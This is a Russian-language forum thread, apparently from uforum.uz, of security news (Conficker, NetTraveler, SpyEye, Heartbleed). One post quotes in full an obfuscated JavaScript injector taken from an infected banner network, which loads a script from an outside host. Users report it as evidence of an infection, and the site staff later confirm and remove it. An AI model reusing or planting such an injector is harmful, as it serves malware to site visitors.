Просмотр полной версии : «БЕЗОПАСНЫЕ» НОВОСТИ
опубликован "Таллинский учебник"
Все специалисты в мире, которые имеют отношение к информационной безопасности, получили в распоряжение первый в истории официальный международный справочник по методам ведения кибервойны. Работа над книгой заняла почти четыре года, редактор издания — Майкл Шмитт (Michael N. Schmitt), директор отдела международного законодательства из американского военного колледжа в Ньюпорте, редакционная коллегия состоит из 20-ти человек.
добро пожаловать в век кибервойн (http://dfiles.ru/files/d2zdpyqj7) :naughty:
Департамент образования города Шверин (Германия) не придумал ничего лучшего, как отправить на свалку 170 компьютеров (http://www.heise.de/newsticker/meldung/Schwerin-Virus-verseuchter-Rechner-Ab-auf-den-Muell-damit-1851718.html), заражённых вирусом Conficker. Сейчас этот инцидент расследуют власти. По их мнению, инвестиции 187 300 евро в столь радикальную форму удаления вирусов неприемлемо высоки. Из этой суммы 152 300 евро составляют затраты на покупку новой техники, а ещё 35 000 — затраты на её установку.
Инцидент произошёл в сентябре 2010 года, на пике заражения червём Conficker, в нескольких отделениях Педагогического института повышения квалификации (Rechner des Lehrerfortbildungsinstituts).
Что удивительно, департамент образования города Шверин защищал сделанные «инвестиции». Они говорили, что закупка лицензионных антивирусных программ, найм специалистов и проведение работ по удалению вирусов с компьютеров обошлись бы в 130 000 евро. У них якобы нет таких денег. Они посчитали, что разница небольшая, и лучше сделать апгрейд под предлогом «неисправности оборудования», получив на это дополнительное финансирование из бюджета. В итоге, решили очистить от вирусов только сервер, а все персональные компьютеры выкинуть.вот, молодцы, ребята.. правильно.. не хочешь заразиться - выдерни патч-корд, отруби нет, а если заразился - выброси комп и иди дальше.. нет слов :naughty: как оказывается все просто ...
нет предела совершенствованию. (http://www.xakep.ru/post/60569/default.asp).
умно...
Один из последних проектов хакера Аарона Шварца перед самоубийством в январе 2013 года — криптографически защищенная система Strongbox («Сейф»), с помощью которой информаторы могут надежно гарантировать свою анонимность, отправляя материалы в СМИ.
(http://www.xakep.ru/post/60638/default.asp)
Касперски как всегда богат на раскрытие всяких глобальных вселенских шпионских сетей.. можно просто каждые два месяца публиковать пресс-релизы про всякие сети, тем более, что все новые похожи от и до на Красный октябрь...
Шпион, выйдти вон: «Лаборатория Касперского» раскрыла новую сеть кибершпионажа NetTraveler
//04.06.2013 http://www.xakep.ru/i/print_icon.png (http://www.xakep.ru/post/60732/default.asp?print=true) http://www.xakep.ru/i/comm_icon.png (http://www.xakep.ru/post/60732/default.asp#comment)
«Лаборатория Касперского» объявила о раскрытии новой кибершпионской сети, получившей название NetTraveler и затронувшей более 350 компьютерных систем в 40 странах мира. Атаке подверглись государственные и частные структуры, в том числе правительственные учреждения, посольства, научно-исследовательские центры, военные организации, компании нефтегазового сектора, а также политические активисты. Россия оказалась в числе наиболее пострадавших стран, заняв вторую строчку в рейтинге государств, испытавших на себе наиболее заметные последствия операции NetTraveler.
все это было и раньше...
Названия вложений наглядно демонстрируют целевой характер операции: злоумышленники адаптировали имя документа каждый раз при отправлении его в другую организацию таким образом, чтобы побудить получателя открыть файл.
Опубликован текст директивы Обамы по ведению операций в интернете (http://www.guardian.co.uk/world/interactive/2013/jun/07/obama-cyber-directive-full-text)
Очередное изобретение АНБ (http://www.xakep.ru/post/60758/default.asp)
Shitikov Roman
20.09.2013, 18:51
Угроза однако
https://img.uforum.uz/images/cvptvdh5696939.png
alisherk
23.10.2013, 07:57
онлайн карта ddos`a (http://www.digitalattackmap.com/#anim=1&color=0&country=ALL&time=16000&view=map)
Dmitry Paleev
30.01.2014, 11:11
Согласно официальному пресс-релизу прокуратуры города Атланта, штат Джорджия, США, федеральный суд рассмотрел дело об обвинении россиянина Александра Панина, известного под ником Gribodemon, в создании вируса SpyEye.
24-летний программист из России признал себя виновным в преступном сговоре с целью организации махинаций с денежными средствами и мошенничества, а также в создании троянской программы SpyEye.
Напомним, что троян, созданный Паниным, при инфицировании компьютера предоставлял хакерам доступ к учетным данным, PIN-кодам и другой информации о банковских счетах и платежных картах жертв.
Находясь в свободном доступе в сети Интернет. вирус скомпрометировал 1,4 млн компьютеров по всему миру. Более того, создатель продал SpyEye 150 «клиентам», один из которых за 6 месяцев использования трояна похитил более $3,2 млн со счетов жертв.
В 2010 году при помощи SpyEye хакеры похитили почти $70 млн у различных компаний, муниципалитетов и церквей в США.
Преступная группировка была обнаружена в 2011 году, а в июле 2013 года Панин был арестован в Доминиканской Республике и экстрадирован в США.
Факт признания вины и сотрудничество с властями позволило жителю Твери рассчитывать на 30 лет тюрьмы.
По словам адвоката подсудимого Аркадия Бука, тюремное заключение является лучшим, на что мог рассчитывать его клиент. Учитывая, что ФБР и правоохранительные органы США назвали Панина «одним из самых видных киберпреступников, из тех, кого удалось задержать и предать суду», обвинение могло потребовать высшую меру наказания.
Как отмечается в сообщении прокуратуры, приговор Панину будет вынесен 29 апреля текущего года.
Иванов Михаил
30.01.2014, 22:58
Рекламная сеть adv.uzinfocom.uz инфицирована JS:Redirector-BJC [Trj]
Баннеры этой сети размещены на uforum.uz
Подробности тут (http://www.avast.ru/lp-fr-virus-alert?p_ext=&utm_campaign=Virus_alert&utm_source=prg_fav_90_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_vir=JS:Redirector-BJC%20[Trj]&p_prc=C:\Users\mic\AppData\Local\Google\Chrome\App lication\chrome.exe&p_obj=http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE|{gzip}&p_var=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_elm=7&p_lex=350&p_lid=ru-ru&p_lng=ru&p_lqa=0&p_lqe=0&p_lst=0&p_lsu=24&p_pro=0&p_bld=empty&p_vep=9&p_ves=0&p_vbd=2011&p_hid=6ba2277c-16ff-4485-878f-00acd9417b3d&p_ram=1982&p_cpu=4%2C9)
Уже пару недель, обычно такие "дыры" быстро устраняют, но так долго не "лечить" это нормально? На сколько я знаю это сценарий языка Java Script,которые содержит ссылки на зараженные странницы с которых в итоге происходит загрузка прочего malware. Если не стоит антивирус на компе, на ваш комп загрузиться malware/
=======================
http://i.imgur.com/6oRYZPn.png
=======================
Eldar Ishimbaev
31.01.2014, 13:10
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Иванов Михаил
31.01.2014, 18:08
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером (http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE) ?
<script>try{$_=~[];$_={___:++$_,$$$$:(![]+"")[$_],__$:++$_,$_$_:(![]+"")[$_],_$_:++$_,$_$$:({}+"")[$_],$$_$:($_[$_]+"")[$_],_$$:++$_,$$$_:(!""+"")[$_],$__:++$_,$_$:++$_,$$__:({}+"")[$_],$$_:++$_,$$$:++$_,$___:++$_,$__$:++$_};$_.$_=($_. $_=$_+"")[$_.$_$]+($_._$=$_.$_[$_.__$])+($_.$$=($_.$+"")[$_.__$])+((!$_)+"")[$_._$$]+($_.__=$_.$_[$_.$$_])+($_.$=(!""+"")[$_.__$])+($_._=(!""+"")[$_._$_])+$_.$_[$_.$_$]+$_.__+$_._$+$_.$;$_.$$=$_.$+(!""+"")[$_._$$]+$_.__+$_._+$_.$+$_.$$;$_.$=($_.___)[$_.$_][$_.$_];$_.$($_.$($_.$$+"\""+$_.$$_$+"="+$_.$$_$+$_._$+$_.$$__+$_._+"\\"+$_.__$+$_.$_$+$_.$_$+$_.$$$_+"\\"+$_.__$+$_.$_$+$_.$$_+$_.__+";"+$_._+$_.$_$_+"=\\"+$_.__$+$_.$_$+$_.$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_.$$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$__+$_.$$$+$_.$_$_+$_.__+$_._$+"\\"+$_.__$+$_.$$_+$_._$_+"."+$_._+"\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.___+$_.__$+"\\"+$_.__$+$_.$__+$_.$$$+$_.$$$_+"\\"+$_.__$+$_.$_$+$_.$$_+$_.__+";\\"+$_.__$+$_.$_$+$_.__$+$_.$$$$+"("+$_.$$_$+"._\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$$$+$_.___+"==="+$_._+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$_$+$_.$$$_+$_.$$$$+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$_+$_.$$_$+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$_.$$_$+"."+$_.$$__+$_._$+$_._$+"\\"+$_.__$+$_.$_$+$_._$$+"\\"+$_.__$+$_.$_$+$_.__$+$_.$$$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$+$_.$_$+$_.___+"('_"+$_._+$_.__+"\\"+$_.__$+$_.$_$+$_.$_$+$_._+$_.$$_$+"=')==-"+$_.__$+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$_._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$+$_.$_$+$_.___+"('\\"+$_.__$+$_._$_+$_.$$$+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$_$+$_._$+"\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$+$_.$$_+$_._$$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+$_.$$_+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.$__+$_.___+"')>"+$_.___+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$_._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$+$_.$_$+$_.___+"('\\"+$_.__$+$_.__$+$_.$_$+"\\"+$_.__$+$_._$_+$_._$$+"\\"+$_.__$+$_.__$+$_.__$+"\\"+$_.__$+$_.___+$_.$_$+"\\"+$_.$__+$_.___+"')>"+$_.___+")\\"+$_.$__+$_.___+"{"+$_.$$_$+"._\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$$$+$_.___+"="+$_.__$+";"+$_.$$_$+"."+$_.$$__+$_._$+$_._$+"\\"+$_.__$+$_.$_$+$_._$$+"\\"+$_.__$+$_.$_$+$_.__$+$_.$$$_+"='__"+$_._+$_.__+"\\"+$_.__$+$_.$_$+$_.$_$+$_._+$_.$$_$+"="+$_.__$+";\\"+$_.$__+$_.___+$_.$$$_+"\\"+$_.__$+$_.$$$+$_.___+"\\"+$_.__$+$_.$$_+$_.___+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$$_+"\\"+$_.__$+$_.$$_+$_._$$+"=\\"+$_.__$+$_._$_+$_.$$$+$_.$$$_+$_.$$_$+",\\"+$_.$__+$_.___+$_.___+$_.__$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+$_._$_+$_.$_$_+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.$__+$_.___+$_._$_+$_.___+$_._$_+$_.___+"\\"+$_.$__+$_.___+$_.___+$_.___+":"+$_.___+$_.___+":"+$_.___+$_.___+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_._$_+$_.$_$+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.__$+$_.___+$_._$$+";\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_.___+$_.$_$_+$_.__+"\\"+$_.__$+$_.$_$+$_.___+"=/';"+$_.$$_$+".\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+$_.__+$_.$$$_+(![]+"")[$_._$_]+"\\"+$_.__$+$_.$_$+$_.$$_+"(\\\"<\\"+$_.__$+$_.$$_+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$_+$_._$_+"\\\"+\\\"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_.___+$_.__+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_._$$+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"='\\"+$_.__$+$_.$_$+$_.___+$_.__+$_.__+"\\"+$_.__$+$_.$$_+$_.___+"://"+$_.$_$$+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.__$+$_.$$_+$_._$$+"."+$_.$_$$+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$$+$_._$_+"/"+$_.$_$+$_.$_$$+$_.$_$$+$_.$_$$+$_.___+$_.$$$_+$_. _$_+$_.__$+".\\"+$_.__$+$_.$_$+$_._$_+"\\"+$_.__$+$_.$$_+$_._$$+"?"+$_.$$__+"\\"+$_.__$+$_.$$_+$_.___+"="+$_.$_$_+$_.$$_$+"\\"+$_.__$+$_.$$_+$_.$$_+"."+$_._+"\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$$+$_._$+$_.$$__+$_._$+"\\"+$_.__$+$_.$_$+$_.$_$+"."+$_._+"\\"+$_.__$+$_.$$$+$_._$_+"'></\\"+$_.__$+$_.$$_+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\\"+\\\"\\"+$_.__$+$_.$$_+$_.___+$_.__+">\\\");}"+"\"")())();}catch(e){}</script>
http://uforum.uz/attachment.php?attachmentid=9398&stc=1&d=1391173179
с регулярными выражениями
Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/
Иванов Михаил
31.01.2014, 19:10
с регулярными выражениями
Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/
Я на столько не разбираюсь в js/ А как его декомпилировать или расшифровать? Возможно это и не "вирус", но часто именно к скрытию кода прибегают создатели вирусов.
UPD вот похожий код http://www.linux.org.ru/forum/web-development/5547798
Ramil Ziganshin
31.01.2014, 19:28
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером (http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE) ?
Ведем анализ. По результатам отпишемся.
Иванов Михаил
31.01.2014, 19:50
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Ведем анализ. По результатам отпишемся.
Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало (http://bezoom.uz/novosti/uzbekistan/1180-pochemu-google-zablokiroval-sajt-informagentstva-uzbekistana) заражение на своем сайте. А "заражение" присутствовало.
Ramil Ziganshin
31.01.2014, 20:22
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Ведем анализ. По результатам отпишемся.
Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало (http://bezoom.uz/novosti/uzbekistan/1180-pochemu-google-zablokiroval-sajt-informagentstva-uzbekistana) заражение на своем сайте. А "заражение" присутствовало.
Нашли вредоносный код. Удалили.
Ramil Ziganshin
31.01.2014, 20:26
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером (http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE) ?
Спасибо за сообщение. Проведем ревизию, усилим защиту.
Спасибо за сообщение. Проведем ревизию, усилим защиту.
о реакции антивирусов на ваши рекламные баннеры уже писали полтора месяц назад, видимо "доходит" не с первого раза
Anvar Atakhanov
31.01.2014, 21:37
Полцарства тому кто устранить эту проблему:
https://img.uforum.uz/images/murksms8701437.jpg
Задолбал уже:dash2:
Полцарства тому кто устранить эту проблему:
сменить браузер на время
Anvar Atakhanov
31.01.2014, 21:45
сменить браузер на время
Не дам вам полцарства Как то привик к этому браузеру, удобный, главной - БЕЗОПАСНЫЙ
Азизбек Кадыров
31.01.2014, 23:31
Полцарства тому кто устранить эту проблему:
Установите себе любой блокировщик рекламы. Для Firefox подойдет AdBlock, для Opera 10-12 можно отключить загрузку флеш в настройках, перейдя по адресу opera:config.
Anvar Atakhanov
31.01.2014, 23:59
У меня хромоид в виде Яндекс браузер, но будем ковыряться...
Тот же браузер. Но сейчас уже молчит.
Сейчас на Яндексе опять эта хрень вылезает. Интересно почему так реакция? Антивирус Comodo.
Полцарства тому кто устранить эту проблему:
Установите себе любой блокировщик рекламы. Для Firefox подойдет AdBlock, для Opera 10-12 можно отключить загрузку флеш в настройках, перейдя по адресу opera:config.
зря вы про флэш, на рекламе инфокома был небезопасный javascript код
Полцарства тому кто устранить эту проблему:
https://img.uforum.uz/images/murksms8701437.jpg
Задолбал уже:dash2:
Заходила на сайт с компа, где стоял аваст, у меня было тоже самое, сейчас сижу с компа, где стоит каспер, все нормально
Ramil Ziganshin
03.02.2014, 09:16
Полцарства тому кто устранить эту проблему:
Задолбал уже:dash2:
Заходила на сайт с компа, где стоял аваст, у меня было тоже самое, сейчас сижу с компа, где стоит каспер, все нормально
Уважаемые пользователи. Ресурс adv.uzinfocom.uz по ошибке попал в Blacklist системы Yandex Safebrowsin - вот ссылка (https://www.virustotal.com/ru/url/d36aee90fef99dcba42a4aecb599f22099ce0ed7e8cd25c4b5 230926cf6b018f/analysis/1390823809/).
Уважаемые пользователи. Ресурс adv.uzinfocom.uz по ошибке попал в Blacklist системы Yandex Safebrowsin - вот ссылка (https://www.virustotal.com/ru/url/d36aee90fef99dcba42a4aecb599f22099ce0ed7e8cd25c4b5 230926cf6b018f/analysis/1390823809/).
не по ошибке, а заслуженно
ClockeeLoo
21.02.2014, 20:40
Разрешено ли создавать сайты о вирусах типа стилеры, раты, крипторы, логгеры и выкладывать их туда?
Вроде таких сайтов в узнете нет, поэтому хотел создать такой форум.
Иванов Михаил
12.03.2014, 17:38
http://i.imgur.com/nlOkwpu.png
Рекламная баннерная сеть afishamedia.uz разносит js вредоносный код (http://www.avast.ru/lp-fr-virus-alert?p_ext=&utm_campaign=Virus_alert&utm_source=prg_fav_90_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_vir=JS:Redirector-BJB%20[Trj]&p_prc=C:\Users\mic\AppData\Local\Google\Chrome\App lication\chrome.exe&p_obj=http://oa.afishamedia.uz/www/delivery/spc.php?zones=10%7C11%7C12%7C13%7C27%7C30&source=politics&r=27126290&charset=UTF-8&loc=http%3A//www.gazeta.uz/2014/03/12/law/&referer=https%3A//www.facebook.com/|{gzip}&p_var=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_elm=7&p_lex=309&p_lid=ru-ru&p_lng=ru&p_lqa=0&p_lqe=0&p_lst=0&p_lsu=24&p_pro=0&p_bld=empty&p_vep=9&p_ves=0&p_vbd=2013&p_hid=6ba2277c-16ff-4485-878f-00acd9417b3d&p_ram=1982&p_cpu=4%2C9)
oa.afishamedia.uz использует тот же openx (http://openx.com/) что был заражен ранее на uforum (http://uforum.uz/showthread.php?p=969685&postcount=261)
German Stimban
17.03.2014, 15:04
Разрешено ли создавать сайты о вирусах типа стилеры, раты, крипторы, логгеры и выкладывать их туда?
Вроде таких сайтов в узнете нет, поэтому хотел создать такой форум.
Это будет копипаста с иностранных сайтов или авторские статьи?
ClockeeLoo
18.03.2014, 21:49
Разрешено ли создавать сайты о вирусах типа стилеры, раты, крипторы, логгеры и выкладывать их туда?
Вроде таких сайтов в узнете нет, поэтому хотел создать такой форум.
Это будет копипаста с иностранных сайтов или авторские статьи?
копипаста
Janbolat
31.03.2014, 09:33
«Лаборатория Касперского» запустила интерактивную карту для отслеживания киберугроз. (http://cyberwar.kaspersky.com/)
German Stimban
31.03.2014, 14:21
Это будет копипаста с иностранных сайтов или авторские статьи?
копипаста
Тогда зачем такое счастье нужно?
ClockeeLoo
03.04.2014, 22:21
https://img.uforum.uz/images/wdyyhvj778674.jpg
Критическая уязвимость в OpenSSL 1.0.1 и 1.0.2-beta шагает по планете:
Несколько часов назад сотрудники The OpenSSL Project выпустили бюллетень безопасности (https://www.openssl.org/news/secadv_20140407.txt), в котором сообщается о критической уязвимости CVE-2014-0160 в популярной криптографической библиотеке OpenSSL.
Уязвимость связана с отсутствием необходимой проверки границ (https://github.com/openssl/openssl/commit/7e840163c06c7692b796a93e3fa85a93136adbb2) в одной из процедур расширения Heartbeat (RFC6520) для протокола TLS/DTLS. Из-за этой маленькой ошибки одного программиста кто угодно получает прямой доступ к оперативной памяти компьютеров, чьи коммуникации «защищены» уязвимой версией OpenSSL. В том числе, злоумышленник получает доступ к секретным ключам, именам и паролям пользователей и всему контенту, который должен передаваться в зашифрованном виде. При этом не остается никаких следов проникновения в систему.
Некто, знавший об уязвимости, мог прослушивать «зашифрованный» трафик почти во всем интернете с марта 2012 года, когда вышла версия OpenSSL 1.0.1. В то время была продемонстрирована успешная атака на TLS (BEAST), и многие перешли на защищенную версию TLS 1.2, появление которой совпало с выходом OpenSSL 1.0.1.
Уязвимая версия OpenSSL используется в популярных веб-серверах Nginx и Apache, на почтовых серверах, IM-серверах, VPN, а также во множестве других программ. Ущерб от этого бага исключительно велик.
Азизбек Кадыров
08.04.2014, 22:50
Несколько часов назад сотрудники The OpenSSL Project выпустили бюллетень безопасности, в котором сообщается о критической уязвимости CVE-2014-0160 в популярной криптографической библиотеке OpenSSL.
Уязвимость? Или же намеренно оставленная закладка?
Марат Фаттахов
09.04.2014, 23:24
Это не просто уязвимость, это полный epic fail!
Проблема в том, что фактически любой более менее грамотный чел, может отправить спец. запрос на уязвимый сервер и получить содержимое части памяти этого сервера. А в этом содержимом - логины/пароли/куки/транзакции и многое другое.
Прежде всего в полной Ж - банки (привет интернет-банкингу), платёжные системы (пайнет в том числе) и интернет-провайдеры, имеющие персональный кабинет по HTTPS с уязвимым SSL).
Рунет уже на ушах стоит: http://habrahabr.ru/post/218661/
ИМХО сейчас такой момент, что сотрудникам UZ-CERT надо собраться с духом и обойти всевозможные HTTPS сайты, так или иначе имеющие отношение к Узбекистану, выйти на их сисадминов с настойчивой просьбой проапгрейдить SSL!
ИМХО сейчас такой момент, что сотрудникам UZ-CERT надо собраться с духом и обойти всевозможные HTTPS сайты, так или иначе имеющие отношение к Узбекистану, выйти на их сисадминов с настойчивой просьбой проапгрейдить SSL!
бредовая идея.
uz-cert ни за что не отвечает, так зачем впрягатся
Eldar Ishimbaev
10.04.2014, 09:22
что сотрудникам UZ-CERT надо собраться с духом и обойти всевозможные HTTPS сайты
UZ-CERT прекратил свое существование с ноября месяца 2013 года. Все функции и задачи переданы в ГУ Центр обеспечения информационной безопасности.
saidabek1
17.02.2016, 22:17
Прощай, Opera mini! Спасибо те за все! Разблокировка браузера и продажа Opera Software китайской компании хорошо совпадают по времени. Есть ли у тех, кто разблокировал Opera Software в Узбекистане, доступ к Золотому Щиту, или нет - сие не важно. Разблокированное - что жало, положи, где лежало...
Прощай, Opera mini! Спасибо те за все! Разблокировка браузера и продажа Opera Software китайской компании хорошо совпадают по времени. Есть ли у тех, кто разблокировал Opera Software в Узбекистане, доступ к Золотому Щиту, или нет - сие не важно. Разблокированное - что жало, положи, где лежало... Вообще ничего не понял....
vBulletin® v3.8.5, Copyright ©2000-2026, Jelsoft Enterprises Ltd. Перевод: zCarot